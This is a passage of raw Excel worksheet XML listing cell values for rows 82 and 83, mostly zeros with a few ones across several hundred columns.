        <v>0</v>
      </c>
      <c r="AT82">
        <v>0</v>
      </c>
      <c r="AU82">
        <v>0</v>
      </c>
      <c r="AV82">
        <v>0</v>
      </c>
      <c r="AW82">
        <v>0</v>
      </c>
      <c r="AX82">
        <v>0</v>
      </c>
      <c r="AY82">
        <v>0</v>
      </c>
      <c r="AZ82">
        <v>0</v>
      </c>
      <c r="BA82">
        <v>0</v>
      </c>
      <c r="BB82">
        <v>0</v>
      </c>
      <c r="BC82">
        <v>0</v>
      </c>
      <c r="BD82">
        <v>0</v>
      </c>
      <c r="BE82">
        <v>0</v>
      </c>
      <c r="BF82">
        <v>0</v>
      </c>
      <c r="BG82">
        <v>0</v>
      </c>
      <c r="BH82">
        <v>0</v>
      </c>
      <c r="BI82">
        <v>0</v>
      </c>
      <c r="BJ82">
        <v>0</v>
      </c>
      <c r="BK82">
        <v>0</v>
      </c>
      <c r="BL82">
        <v>0</v>
      </c>
      <c r="BM82">
        <v>0</v>
      </c>
      <c r="BN82">
        <v>0</v>
      </c>
      <c r="BO82">
        <v>0</v>
      </c>
      <c r="BP82">
        <v>0</v>
      </c>
      <c r="BQ82">
        <v>0</v>
      </c>
      <c r="BR82">
        <v>0</v>
      </c>
      <c r="BS82">
        <v>0</v>
      </c>
      <c r="BT82">
        <v>0</v>
      </c>
      <c r="BU82">
        <v>0</v>
      </c>
      <c r="BV82">
        <v>0</v>
      </c>
      <c r="BW82">
        <v>0</v>
      </c>
      <c r="BX82">
        <v>0</v>
      </c>
      <c r="BY82">
        <v>0</v>
      </c>
      <c r="BZ82">
        <v>0</v>
      </c>
      <c r="CA82">
        <v>0</v>
      </c>
      <c r="CB82">
        <v>0</v>
      </c>
      <c r="CC82">
        <v>0</v>
      </c>
      <c r="CD82">
        <v>0</v>
      </c>
      <c r="CE82">
        <v>0</v>
      </c>
      <c r="CF82">
        <v>1</v>
      </c>
      <c r="CG82">
        <v>0</v>
      </c>
      <c r="CH82">
        <v>0</v>
      </c>
      <c r="CI82">
        <v>0</v>
      </c>
      <c r="CJ82">
        <v>0</v>
      </c>
      <c r="CK82">
        <v>0</v>
      </c>
      <c r="CL82">
        <v>0</v>
      </c>
      <c r="CM82">
        <v>0</v>
      </c>
      <c r="CN82">
        <v>0</v>
      </c>
      <c r="CO82">
        <v>0</v>
      </c>
      <c r="CP82">
        <v>0</v>
      </c>
      <c r="CQ82">
        <v>0</v>
      </c>
      <c r="CR82">
        <v>0</v>
      </c>
      <c r="CS82">
        <v>0</v>
      </c>
      <c r="CT82">
        <v>0</v>
      </c>
      <c r="CU82">
        <v>0</v>
      </c>
      <c r="CV82">
        <v>0</v>
      </c>
      <c r="CW82">
        <v>0</v>
      </c>
      <c r="CX82">
        <v>0</v>
      </c>
      <c r="CY82">
        <v>0</v>
      </c>
      <c r="CZ82">
        <v>0</v>
      </c>
      <c r="DA82">
        <v>0</v>
      </c>
      <c r="DB82">
        <v>0</v>
      </c>
      <c r="DC82">
        <v>0</v>
      </c>
      <c r="DD82">
        <v>0</v>
      </c>
      <c r="DE82">
        <v>0</v>
      </c>
      <c r="DF82">
        <v>0</v>
      </c>
      <c r="DG82">
        <v>0</v>
      </c>
      <c r="DH82">
        <v>0</v>
      </c>
      <c r="DI82">
        <v>0</v>
      </c>
      <c r="DJ82">
        <v>0</v>
      </c>
      <c r="DK82">
        <v>1</v>
      </c>
      <c r="DL82">
        <v>0</v>
      </c>
      <c r="DM82">
        <v>0</v>
      </c>
      <c r="DN82">
        <v>0</v>
      </c>
      <c r="DO82">
        <v>0</v>
      </c>
      <c r="DP82">
        <v>0</v>
      </c>
      <c r="DQ82">
        <v>0</v>
      </c>
      <c r="DR82">
        <v>0</v>
      </c>
      <c r="DS82">
        <v>0</v>
      </c>
      <c r="DT82">
        <v>0</v>
      </c>
      <c r="DU82">
        <v>0</v>
      </c>
      <c r="DV82">
        <v>0</v>
      </c>
      <c r="DW82">
        <v>0</v>
      </c>
      <c r="DX82">
        <v>0</v>
      </c>
      <c r="DY82">
        <v>0</v>
      </c>
      <c r="DZ82">
        <v>0</v>
      </c>
      <c r="EA82">
        <v>0</v>
      </c>
      <c r="EB82">
        <v>0</v>
      </c>
      <c r="EC82">
        <v>0</v>
      </c>
      <c r="ED82">
        <v>0</v>
      </c>
      <c r="EE82">
        <v>0</v>
      </c>
      <c r="EF82">
        <v>0</v>
      </c>
      <c r="EG82">
        <v>0</v>
      </c>
      <c r="EH82">
        <v>0</v>
      </c>
      <c r="EI82">
        <v>0</v>
      </c>
      <c r="EJ82">
        <v>0</v>
      </c>
      <c r="EK82">
        <v>0</v>
      </c>
      <c r="EL82">
        <v>0</v>
      </c>
      <c r="EM82">
        <v>0</v>
      </c>
      <c r="EN82">
        <v>0</v>
      </c>
      <c r="EO82">
        <v>0</v>
      </c>
      <c r="EP82">
        <v>0</v>
      </c>
      <c r="EQ82">
        <v>0</v>
      </c>
      <c r="ER82">
        <v>0</v>
      </c>
      <c r="ES82">
        <v>0</v>
      </c>
      <c r="ET82">
        <v>0</v>
      </c>
      <c r="EU82">
        <v>0</v>
      </c>
      <c r="EV82">
        <v>0</v>
      </c>
      <c r="EW82">
        <v>0</v>
      </c>
      <c r="EX82">
        <v>0</v>
      </c>
      <c r="EY82">
        <v>0</v>
      </c>
      <c r="EZ82">
        <v>0</v>
      </c>
      <c r="FA82">
        <v>0</v>
      </c>
      <c r="FB82">
        <v>0</v>
      </c>
      <c r="FC82">
        <v>0</v>
      </c>
      <c r="FD82">
        <v>0</v>
      </c>
      <c r="FE82">
        <v>0</v>
      </c>
      <c r="FF82">
        <v>0</v>
      </c>
      <c r="FG82">
        <v>0</v>
      </c>
      <c r="FH82">
        <v>0</v>
      </c>
      <c r="FI82">
        <v>0</v>
      </c>
      <c r="FJ82">
        <v>0</v>
      </c>
      <c r="FK82">
        <v>0</v>
      </c>
      <c r="FL82">
        <v>0</v>
      </c>
      <c r="FM82">
        <v>0</v>
      </c>
      <c r="FN82">
        <v>0</v>
      </c>
      <c r="FO82">
        <v>0</v>
      </c>
      <c r="FP82">
        <v>0</v>
      </c>
      <c r="FQ82">
        <v>0</v>
      </c>
      <c r="FR82">
        <v>0</v>
      </c>
      <c r="FS82">
        <v>0</v>
      </c>
      <c r="FT82">
        <v>0</v>
      </c>
      <c r="FU82">
        <v>0</v>
      </c>
      <c r="FV82">
        <v>0</v>
      </c>
      <c r="FW82">
        <v>0</v>
      </c>
      <c r="FX82">
        <v>0</v>
      </c>
      <c r="FY82">
        <v>0</v>
      </c>
      <c r="FZ82">
        <v>0</v>
      </c>
      <c r="GA82">
        <v>0</v>
      </c>
      <c r="GB82">
        <v>0</v>
      </c>
      <c r="GC82">
        <v>0</v>
      </c>
      <c r="GD82">
        <v>0</v>
      </c>
      <c r="GE82">
        <v>0</v>
      </c>
      <c r="GF82">
        <v>0</v>
      </c>
      <c r="GG82">
        <v>0</v>
      </c>
      <c r="GH82">
        <v>0</v>
      </c>
      <c r="GI82">
        <v>0</v>
      </c>
      <c r="GJ82">
        <v>0</v>
      </c>
      <c r="GK82">
        <v>0</v>
      </c>
      <c r="GL82">
        <v>0</v>
      </c>
      <c r="GM82">
        <v>0</v>
      </c>
      <c r="GN82">
        <v>0</v>
      </c>
      <c r="GO82">
        <v>0</v>
      </c>
      <c r="GP82">
        <v>0</v>
      </c>
      <c r="GQ82">
        <v>0</v>
      </c>
      <c r="GR82">
        <v>0</v>
      </c>
      <c r="GS82">
        <v>0</v>
      </c>
      <c r="GT82">
        <v>0</v>
      </c>
      <c r="GU82">
        <v>0</v>
      </c>
      <c r="GV82">
        <v>0</v>
      </c>
      <c r="GW82">
        <v>0</v>
      </c>
      <c r="GX82">
        <v>0</v>
      </c>
      <c r="GY82">
        <v>0</v>
      </c>
      <c r="GZ82">
        <v>0</v>
      </c>
      <c r="HA82">
        <v>0</v>
      </c>
      <c r="HB82">
        <v>0</v>
      </c>
      <c r="HC82">
        <v>0</v>
      </c>
      <c r="HD82">
        <v>0</v>
      </c>
      <c r="HE82">
        <v>0</v>
      </c>
      <c r="HF82">
        <v>0</v>
      </c>
      <c r="HG82">
        <v>0</v>
      </c>
      <c r="HH82">
        <v>0</v>
      </c>
      <c r="HI82">
        <v>0</v>
      </c>
      <c r="HJ82">
        <v>0</v>
      </c>
      <c r="HK82">
        <v>0</v>
      </c>
      <c r="HL82">
        <v>0</v>
      </c>
      <c r="HM82">
        <v>0</v>
      </c>
      <c r="HN82">
        <v>0</v>
      </c>
      <c r="HO82">
        <v>0</v>
      </c>
      <c r="HP82">
        <v>0</v>
      </c>
      <c r="HQ82">
        <v>0</v>
      </c>
      <c r="HR82">
        <v>0</v>
      </c>
      <c r="HS82">
        <v>0</v>
      </c>
      <c r="HT82">
        <v>0</v>
      </c>
      <c r="HU82">
        <v>0</v>
      </c>
      <c r="HV82">
        <v>0</v>
      </c>
      <c r="HW82">
        <v>0</v>
      </c>
      <c r="HX82">
        <v>0</v>
      </c>
      <c r="HY82">
        <v>0</v>
      </c>
      <c r="HZ82">
        <v>0</v>
      </c>
      <c r="IA82">
        <v>0</v>
      </c>
      <c r="IB82">
        <v>0</v>
      </c>
      <c r="IC82">
        <v>0</v>
      </c>
      <c r="ID82">
        <v>0</v>
      </c>
      <c r="IE82">
        <v>0</v>
      </c>
      <c r="IF82">
        <v>0</v>
      </c>
      <c r="IG82">
        <v>0</v>
      </c>
      <c r="IH82">
        <v>0</v>
      </c>
      <c r="II82">
        <v>0</v>
      </c>
      <c r="IJ82">
        <v>0</v>
      </c>
      <c r="IK82">
        <v>0</v>
      </c>
      <c r="IL82">
        <v>0</v>
      </c>
      <c r="IM82">
        <v>0</v>
      </c>
      <c r="IN82">
        <v>0</v>
      </c>
      <c r="IO82">
        <v>0</v>
      </c>
      <c r="IP82">
        <v>0</v>
      </c>
      <c r="IQ82">
        <v>0</v>
      </c>
      <c r="IR82">
        <v>0</v>
      </c>
      <c r="IS82">
        <v>0</v>
      </c>
      <c r="IT82">
        <v>0</v>
      </c>
      <c r="IU82">
        <v>0</v>
      </c>
      <c r="IV82">
        <v>0</v>
      </c>
      <c r="IW82">
        <v>0</v>
      </c>
      <c r="IX82">
        <v>0</v>
      </c>
      <c r="IY82">
        <v>0</v>
      </c>
      <c r="IZ82">
        <v>0</v>
      </c>
      <c r="JA82">
        <v>0</v>
      </c>
      <c r="JB82">
        <v>0</v>
      </c>
      <c r="JC82">
        <v>0</v>
      </c>
      <c r="JD82">
        <v>0</v>
      </c>
      <c r="JE82">
        <v>0</v>
      </c>
      <c r="JF82">
        <v>0</v>
      </c>
      <c r="JG82">
        <v>0</v>
      </c>
      <c r="JH82">
        <v>0</v>
      </c>
      <c r="JI82">
        <v>0</v>
      </c>
      <c r="JJ82">
        <v>0</v>
      </c>
      <c r="JK82">
        <v>0</v>
      </c>
      <c r="JL82">
        <v>0</v>
      </c>
      <c r="JM82">
        <v>0</v>
      </c>
      <c r="JN82">
        <v>0</v>
      </c>
      <c r="JO82">
        <v>0</v>
      </c>
      <c r="JP82">
        <v>0</v>
      </c>
      <c r="JQ82">
        <v>0</v>
      </c>
      <c r="JR82">
        <v>0</v>
      </c>
      <c r="JS82">
        <v>0</v>
      </c>
      <c r="JT82">
        <v>0</v>
      </c>
      <c r="JU82">
        <v>0</v>
      </c>
      <c r="JV82">
        <v>0</v>
      </c>
      <c r="JW82">
        <v>0</v>
      </c>
      <c r="JX82">
        <v>0</v>
      </c>
      <c r="JY82">
        <v>0</v>
      </c>
      <c r="JZ82">
        <v>0</v>
      </c>
      <c r="KA82">
        <v>0</v>
      </c>
      <c r="KB82">
        <v>0</v>
      </c>
      <c r="KC82">
        <v>0</v>
      </c>
      <c r="KD82">
        <v>0</v>
      </c>
      <c r="KE82">
        <v>0</v>
      </c>
      <c r="KF82">
        <v>0</v>
      </c>
      <c r="KG82">
        <v>0</v>
      </c>
      <c r="KH82">
        <v>0</v>
      </c>
      <c r="KI82">
        <v>0</v>
      </c>
      <c r="KJ82">
        <v>0</v>
      </c>
      <c r="KK82">
        <v>0</v>
      </c>
      <c r="KL82">
        <v>0</v>
      </c>
      <c r="KM82">
        <v>0</v>
      </c>
      <c r="KN82">
        <v>0</v>
      </c>
      <c r="KO82">
        <v>0</v>
      </c>
      <c r="KP82">
        <v>0</v>
      </c>
      <c r="KQ82">
        <v>0</v>
      </c>
      <c r="KR82">
        <v>0</v>
      </c>
      <c r="KS82">
        <v>0</v>
      </c>
      <c r="KT82">
        <v>0</v>
      </c>
      <c r="KU82">
        <v>0</v>
      </c>
      <c r="KV82">
        <v>0</v>
      </c>
      <c r="KW82">
        <v>0</v>
      </c>
      <c r="KX82">
        <v>0</v>
      </c>
      <c r="KY82">
        <v>0</v>
      </c>
      <c r="KZ82">
        <v>0</v>
      </c>
      <c r="LA82">
        <v>0</v>
      </c>
      <c r="LB82">
        <v>0</v>
      </c>
      <c r="LC82">
        <v>0</v>
      </c>
      <c r="LD82">
        <v>0</v>
      </c>
      <c r="LE82">
        <v>0</v>
      </c>
      <c r="LF82">
        <v>0</v>
      </c>
      <c r="LG82">
        <v>0</v>
      </c>
      <c r="LH82">
        <v>0</v>
      </c>
      <c r="LI82">
        <v>0</v>
      </c>
      <c r="LJ82">
        <v>0</v>
      </c>
      <c r="LK82">
        <v>0</v>
      </c>
      <c r="LL82">
        <v>0</v>
      </c>
      <c r="LM82">
        <v>0</v>
      </c>
      <c r="LN82">
        <v>0</v>
      </c>
      <c r="LO82">
        <v>0</v>
      </c>
      <c r="LP82">
        <v>0</v>
      </c>
      <c r="LQ82">
        <v>0</v>
      </c>
      <c r="LR82">
        <v>0</v>
      </c>
      <c r="LS82">
        <v>0</v>
      </c>
      <c r="LT82">
        <v>0</v>
      </c>
      <c r="LU82">
        <v>0</v>
      </c>
      <c r="LV82">
        <v>0</v>
      </c>
      <c r="LW82">
        <v>0</v>
      </c>
      <c r="LX82">
        <v>0</v>
      </c>
      <c r="LY82">
        <v>0</v>
      </c>
      <c r="LZ82">
        <v>1</v>
      </c>
      <c r="MA82">
        <v>0</v>
      </c>
      <c r="MB82">
        <v>0</v>
      </c>
      <c r="MC82">
        <v>0</v>
      </c>
      <c r="MD82">
        <v>0</v>
      </c>
      <c r="ME82">
        <v>0</v>
      </c>
      <c r="MF82">
        <v>0</v>
      </c>
      <c r="MG82">
        <v>0</v>
      </c>
      <c r="MH82">
        <v>0</v>
      </c>
      <c r="MI82">
        <v>0</v>
      </c>
      <c r="MJ82">
        <v>0</v>
      </c>
      <c r="MK82">
        <v>0</v>
      </c>
      <c r="ML82">
        <v>0</v>
      </c>
      <c r="MM82">
        <v>0</v>
      </c>
      <c r="MN82">
        <v>0</v>
      </c>
      <c r="MO82">
        <v>0</v>
      </c>
      <c r="MP82">
        <v>0</v>
      </c>
      <c r="MQ82">
        <v>0</v>
      </c>
      <c r="MR82">
        <v>0</v>
      </c>
      <c r="MS82">
        <v>0</v>
      </c>
      <c r="MT82">
        <v>0</v>
      </c>
      <c r="MU82">
        <v>0</v>
      </c>
      <c r="MV82">
        <v>0</v>
      </c>
      <c r="MW82">
        <v>0</v>
      </c>
      <c r="MX82">
        <v>0</v>
      </c>
      <c r="MY82">
        <v>0</v>
      </c>
      <c r="MZ82">
        <v>0</v>
      </c>
      <c r="NA82">
        <v>0</v>
      </c>
      <c r="NB82">
        <v>0</v>
      </c>
      <c r="NC82">
        <v>0</v>
      </c>
      <c r="ND82">
        <v>0</v>
      </c>
      <c r="NE82">
        <v>0</v>
      </c>
      <c r="NF82">
        <v>0</v>
      </c>
      <c r="NG82">
        <v>0</v>
      </c>
      <c r="NH82">
        <v>0</v>
      </c>
      <c r="NI82">
        <v>0</v>
      </c>
      <c r="NJ82">
        <v>0</v>
      </c>
      <c r="NK82">
        <v>0</v>
      </c>
      <c r="NL82">
        <v>0</v>
      </c>
      <c r="NM82">
        <v>0</v>
      </c>
      <c r="NN82">
        <v>0</v>
      </c>
      <c r="NO82">
        <v>0</v>
      </c>
      <c r="NP82">
        <v>0</v>
      </c>
      <c r="NQ82">
        <v>0</v>
      </c>
      <c r="NR82">
        <v>0</v>
      </c>
      <c r="NS82">
        <v>0</v>
      </c>
      <c r="NT82">
        <v>0</v>
      </c>
      <c r="NU82">
        <v>0</v>
      </c>
      <c r="NV82">
        <v>0</v>
      </c>
      <c r="NW82">
        <v>0</v>
      </c>
      <c r="NX82">
        <v>0</v>
      </c>
      <c r="NY82">
        <v>0</v>
      </c>
      <c r="NZ82">
        <v>0</v>
      </c>
      <c r="OA82">
        <v>0</v>
      </c>
      <c r="OB82">
        <v>0</v>
      </c>
      <c r="OC82">
        <v>0</v>
      </c>
      <c r="OD82">
        <v>0</v>
      </c>
      <c r="OE82">
        <v>0</v>
      </c>
      <c r="OF82">
        <v>0</v>
      </c>
      <c r="OG82">
        <v>0</v>
      </c>
      <c r="OH82">
        <v>0</v>
      </c>
      <c r="OI82">
        <v>0</v>
      </c>
      <c r="OJ82">
        <v>0</v>
      </c>
      <c r="OK82">
        <v>0</v>
      </c>
      <c r="OL82">
        <v>0</v>
      </c>
      <c r="OM82">
        <v>0</v>
      </c>
      <c r="ON82">
        <v>0</v>
      </c>
      <c r="OO82">
        <v>0</v>
      </c>
      <c r="OP82">
        <v>0</v>
      </c>
      <c r="OQ82">
        <v>0</v>
      </c>
      <c r="OR82">
        <v>0</v>
      </c>
      <c r="OS82">
        <v>0</v>
      </c>
      <c r="OT82">
        <v>0</v>
      </c>
      <c r="OU82">
        <v>0</v>
      </c>
      <c r="OV82">
        <v>0</v>
      </c>
      <c r="OW82">
        <v>0</v>
      </c>
      <c r="OX82">
        <v>0</v>
      </c>
      <c r="OY82">
        <v>0</v>
      </c>
      <c r="OZ82">
        <v>0</v>
      </c>
      <c r="PA82">
        <v>0</v>
      </c>
      <c r="PB82">
        <v>0</v>
      </c>
      <c r="PC82">
        <v>0</v>
      </c>
      <c r="PD82">
        <v>0</v>
      </c>
      <c r="PE82">
        <v>0</v>
      </c>
      <c r="PF82">
        <v>0</v>
      </c>
      <c r="PG82">
        <v>0</v>
      </c>
      <c r="PH82">
        <v>0</v>
      </c>
      <c r="PI82">
        <v>0</v>
      </c>
      <c r="PJ82">
        <v>0</v>
      </c>
      <c r="PK82">
        <v>0</v>
      </c>
      <c r="PL82">
        <v>0</v>
      </c>
      <c r="PM82">
        <v>0</v>
      </c>
      <c r="PN82">
        <v>0</v>
      </c>
      <c r="PO82">
        <v>0</v>
      </c>
      <c r="PP82">
        <v>0</v>
      </c>
      <c r="PQ82">
        <v>0</v>
      </c>
      <c r="PR82">
        <v>0</v>
      </c>
      <c r="PS82">
        <v>0</v>
      </c>
      <c r="PT82">
        <v>0</v>
      </c>
      <c r="PU82">
        <v>0</v>
      </c>
      <c r="PV82">
        <v>0</v>
      </c>
      <c r="PW82">
        <v>0</v>
      </c>
      <c r="PX82">
        <v>0</v>
      </c>
      <c r="PY82">
        <v>0</v>
      </c>
      <c r="PZ82">
        <v>0</v>
      </c>
      <c r="QA82">
        <v>0</v>
      </c>
      <c r="QB82">
        <v>0</v>
      </c>
      <c r="QC82">
        <v>0</v>
      </c>
      <c r="QD82">
        <v>0</v>
      </c>
      <c r="QE82">
        <v>0</v>
      </c>
      <c r="QF82">
        <v>0</v>
      </c>
      <c r="QG82">
        <v>0</v>
      </c>
      <c r="QH82">
        <v>0</v>
      </c>
      <c r="QI82">
        <v>0</v>
      </c>
      <c r="QJ82">
        <v>0</v>
      </c>
      <c r="QK82">
        <v>0</v>
      </c>
      <c r="QL82">
        <v>0</v>
      </c>
      <c r="QM82">
        <v>0</v>
      </c>
      <c r="QN82">
        <v>0</v>
      </c>
      <c r="QO82">
        <v>0</v>
      </c>
      <c r="QP82">
        <v>0</v>
      </c>
      <c r="QQ82">
        <v>0</v>
      </c>
      <c r="QR82">
        <v>0</v>
      </c>
      <c r="QS82">
        <v>0</v>
      </c>
      <c r="QT82">
        <v>0</v>
      </c>
      <c r="QU82">
        <v>0</v>
      </c>
      <c r="QV82">
        <v>0</v>
      </c>
      <c r="QW82">
        <v>0</v>
      </c>
      <c r="QX82">
        <v>0</v>
      </c>
      <c r="QY82">
        <v>0</v>
      </c>
      <c r="QZ82">
        <v>0</v>
      </c>
      <c r="RA82">
        <v>0</v>
      </c>
      <c r="RB82">
        <v>0</v>
      </c>
      <c r="RC82">
        <v>0</v>
      </c>
      <c r="RD82">
        <v>0</v>
      </c>
      <c r="RE82">
        <v>0</v>
      </c>
      <c r="RF82">
        <v>0</v>
      </c>
      <c r="RG82">
        <v>0</v>
      </c>
      <c r="RH82">
        <v>0</v>
      </c>
      <c r="RI82">
        <v>0</v>
      </c>
      <c r="RJ82">
        <v>0</v>
      </c>
      <c r="RK82">
        <v>0</v>
      </c>
      <c r="RL82">
        <v>0</v>
      </c>
      <c r="RM82">
        <v>0</v>
      </c>
      <c r="RN82">
        <v>0</v>
      </c>
      <c r="RO82">
        <v>0</v>
      </c>
      <c r="RP82">
        <v>0</v>
      </c>
      <c r="RQ82">
        <v>0</v>
      </c>
      <c r="RR82">
        <v>0</v>
      </c>
      <c r="RS82">
        <v>0</v>
      </c>
      <c r="RT82">
        <v>0</v>
      </c>
      <c r="RU82">
        <v>0</v>
      </c>
      <c r="RV82">
        <v>0</v>
      </c>
      <c r="RW82">
        <v>0</v>
      </c>
      <c r="RX82">
        <v>0</v>
      </c>
      <c r="RY82">
        <v>0</v>
      </c>
      <c r="RZ82">
        <v>0</v>
      </c>
      <c r="SA82">
        <v>0</v>
      </c>
    </row>
    <row r="83" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A83" s="6" t="s">
        <v>3317</v>
      </c>
      <c r="B83">
        <v>16</v>
      </c>
      <c r="C83">
        <v>0</v>
      </c>
      <c r="D83">
        <v>0</v>
      </c>
      <c r="E83">
        <v>0</v>
      </c>
      <c r="F83">
        <v>0</v>
      </c>
      <c r="G83">
        <v>0</v>
      </c>
      <c r="H83">
        <v>0</v>
      </c>
      <c r="I83">
        <v>0</v>
      </c>
      <c r="J83">
        <v>0</v>
      </c>
      <c r="K83">
        <v>0</v>
      </c>
      <c r="L83">
        <v>0</v>
      </c>
      <c r="M83">
        <v>1</v>
      </c>
      <c r="N83">
        <v>0</v>
      </c>
      <c r="O83">
        <v>0</v>
      </c>
      <c r="P83">
        <v>0</v>
      </c>
      <c r="Q83">
        <v>0</v>
      </c>
      <c r="R83">
        <v>0</v>
      </c>
      <c r="S83">
        <v>0</v>
      </c>
      <c r="T83">
        <v>0</v>
      </c>
      <c r="U83">
        <v>0</v>
      </c>
      <c r="V83">
        <v>0</v>
      </c>
      <c r="W83">
        <v>1</v>
      </c>
      <c r="X83">
        <v>0</v>
      </c>
      <c r="Y83">
        <v>0</v>
      </c>
      <c r="Z83">
        <v>0</v>
      </c>
      <c r="AA83">
        <v>0</v>
      </c>
      <c r="AB83">
        <v>0</v>
      </c>
      <c r="AC83">
        <v>0</v>
      </c>
      <c r="AD83">
        <v>0</v>
      </c>
      <c r="AE83">
        <v>0</v>
      </c>
      <c r="AF83">
        <v>0</v>
      </c>
      <c r="AG83">
        <v>0</v>
      </c>
      <c r="AH83">
        <v>0</v>
      </c>
      <c r="AI83">
        <v>0</v>
      </c>
      <c r="AJ83">
        <v>0</v>
      </c>
      <c r="AK83">
        <v>0</v>
      </c>
      <c r="AL83">
        <v>0</v>
      </c>
      <c r="AM83">
        <v>0</v>
      </c>
      <c r="AN83">
        <v>0</v>
      </c>
      <c r="AO83">
        <v>0</v>
      </c>
      <c r="AP83">
        <v>0</v>
      </c>
      <c r="AQ83">
        <v>0</v>
      </c>
      <c r="AR83">
        <v>0</v>
      </c>
      <c r="AS83">
        <v>0</v>
      </c>
      <c r="AT83">
        <v>0</v>
      </c>
      <c r="AU83">
        <v>0</v>
      </c>
      <c r="AV83">
        <v>0</v>
      </c>
      <c r="AW83">
        <v>0</v>
      </c>
      <c r="AX83">
        <v>0</v>
      </c>
      <c r="AY83">
        <v>0</v>
      </c>
      <c r="AZ83">
        <v>0</v>
      </c>
      <c r="BA83">
        <v>0</v>
      </c>
      <c r="BB83">
        <v>0</v>
      </c>
      <c r="BC83">
        <v>0</v>
      </c>
      <c r="BD83">
        <v>0</v>
      </c>
      <c r="BE83">
        <v>0</v>
      </c>
      <c r="BF83">
        <v>0</v>
      </c>
      <c r="BG83">
        <v>0</v>
      </c>
      <c r="BH83">
        <v>0</v>
      </c>
      <c r="BI83">
        <v>0</v>
      </c>
      <c r="BJ83">
        <v>0</v>
      </c>
      <c r="BK83">
        <v>0</v>
      </c>
      <c r="BL83">
        <v>0</v>
      </c>
      <c r="BM83">
        <v>0</v>
      </c>
      <c r="BN83">
        <v>0</v>
      </c>
      <c r="BO83">
        <v>0</v>
      </c>
      <c r="BP83">
        <v>0</v>
      </c>
      <c r="BQ83">
        <v>0</v>
      </c>
      <c r="BR83">
        <v>0</v>
      </c>
      <c r="BS83">
        <v>0</v>
      </c>
      <c r="BT83">
        <v>0</v>
      </c>
      <c r="BU83">
        <v>0</v>
      </c>
      <c r="BV83">
        <v>0</v>
      </c>
      <c r="BW83">
        <v>0</v>
      </c>
      <c r="BX83">
        <v>0</v>
      </c>
      <c r="BY83">
        <v>0</v>
      </c>
      <c r="BZ83">
        <v>0</v>
      </c>
      <c r="CA83">
        <v>0</v>
      </c>
      <c r="CB83">
        <v>0</v>
      </c>
      <c r="CC83">
        <v>0</v>
      </c>
      <c r="CD83">
        <v>0</v>
      </c>
      <c r="CE83">
        <v>0</v>
      </c>
      <c r="CF83">
        <v>1</v>
      </c>
      <c r="CG83">
        <v>0</v>
      </c>
      <c r="CH83">
        <v>0</v>
      </c>
      <c r="CI83">
        <v>1</v>
      </c>
      <c r="CJ83">
        <v>0</v>
      </c>
      <c r="CK83">
        <v>1</v>
      </c>
      <c r="CL83">
        <v>0</v>
      </c>
      <c r="CM83">
        <v>0</v>
      </c>
      <c r="CN83">
        <v>0</v>
      </c>
      <c r="CO83">
        <v>0</v>
      </c>
      <c r="CP83">
        <v>0</v>
      </c>
      <c r="CQ83">
        <v>0</v>
      </c>
      <c r="CR83">
        <v>0</v>
      </c>
      <c r="CS83">
        <v>0</v>
      </c>
      <c r="CT83">
        <v>0</v>
      </c>
      <c r="CU83">
        <v>0</v>
      </c>
      <c r="CV83">
        <v>0</v>
      </c>
      <c r="CW83">
        <v>0</v>
      </c>
      <c r="CX83">
        <v>0</v>
      </c>
      <c r="CY83">
        <v>0</v>
      </c>
      <c r="CZ83">
        <v>0</v>
      </c>
      <c r="DA83">
        <v>0</v>
      </c>
      <c r="DB83">
        <v>0</v>
      </c>
      <c r="DC83">
        <v>0</v>
      </c>
      <c r="DD83">
        <v>0</v>
      </c>
      <c r="DE83">
        <v>0</v>
      </c>
      <c r="DF83">
        <v>0</v>
      </c>
      <c r="DG83">
        <v>0</v>
      </c>
      <c r="DH83">
        <v>0</v>
      </c>
      <c r="DI83">
        <v>0</v>
      </c>
      <c r="DJ83">
        <v>0</v>
      </c>
      <c r="DK83">
        <v>0</v>
      </c>
      <c r="DL83">
        <v>0</v>
      </c>
      <c r="DM83">
        <v>0</v>
      </c>
      <c r="DN83">
        <v>0</v>
      </c>
      <c r="DO83">
        <v>0</v>
      </c>
      <c r="DP83">
        <v>0</v>
      </c>
      <c r="DQ83">
        <v>0</v>
      </c>
      <c r="DR83">
        <v>0</v>
      </c>
      <c r="DS83">
        <v>0</v>
      </c>
      <c r="DT83">
        <v>0</v>
      </c>
      <c r="DU83">
        <v>0</v>
      </c>
      <c r="DV83">
        <v>1</v>
      </c>
      <c r="DW83">
        <v>0</v>
      </c>
      <c r="DX83">
        <v>0</v>
      </c>
      <c r="DY83">
        <v>1</v>
      </c>
      <c r="DZ83">
        <v>0</v>
      </c>
      <c r="EA83">
        <v>0</v>
      </c>
      <c r="EB83">
        <v>0</v>
      </c>
      <c r="EC83">
        <v>0</v>
      </c>
      <c r="ED83">
        <v>0</v>
      </c>
      <c r="EE83">
        <v>0</v>
      </c>
      <c r="EF83">
        <v>0</v>
      </c>
      <c r="EG83">
        <v>0</v>
      </c>
      <c r="EH83">
        <v>0</v>
      </c>
      <c r="EI83">
        <v>0</v>
      </c>
      <c r="EJ83">
        <v>0</v>
      </c>
      <c r="EK83">
        <v>0</v>
      </c>
      <c r="EL83">
        <v>0</v>
      </c>
      <c r="EM83">
        <v>0</v>
      </c>
      <c r="EN83">
        <v>0</v>
      </c>
      <c r="EO83">
        <v>0</v>
      </c>
      <c r="EP83">
        <v>0</v>
      </c>
      <c r="EQ83">
        <v>0</v>
      </c>
      <c r="ER83">
        <v>0</v>
      </c>
      <c r="ES83">
        <v>0</v>
      </c>
      <c r="ET83">
        <v>0</v>
      </c>
      <c r="EU83">
        <v>0</v>
      </c>
      <c r="EV83">
        <v>0</v>
      </c>
      <c r="EW83">
        <v>0</v>
      </c>
      <c r="EX83">
        <v>0</v>
      </c>
      <c r="EY83">
        <v>0</v>
      </c>
      <c r="EZ83">
        <v>1</v>
      </c>
      <c r="FA83">
        <v>0</v>
      </c>
      <c r="FB83">
        <v>0</v>
      </c>
      <c r="FC83">
        <v>0</v>
      </c>
      <c r="FD83">
        <v>0</v>
      </c>
      <c r="FE83">
        <v>0</v>
      </c>
      <c r="FF83">
        <v>0</v>
      </c>
      <c r="FG83">
        <v>0</v>
      </c>
      <c r="FH83">
        <v>0</v>
      </c>
      <c r="FI83">
        <v>0</v>
      </c>
      <c r="FJ83">
        <v>0</v>
      </c>
      <c r="FK83">
        <v>0</v>
      </c>
      <c r="FL83">
        <v>0</v>
      </c>
      <c r="FM83">
        <v>0</v>
      </c>
      <c r="FN83">
        <v>0</v>
      </c>
      <c r="FO83">
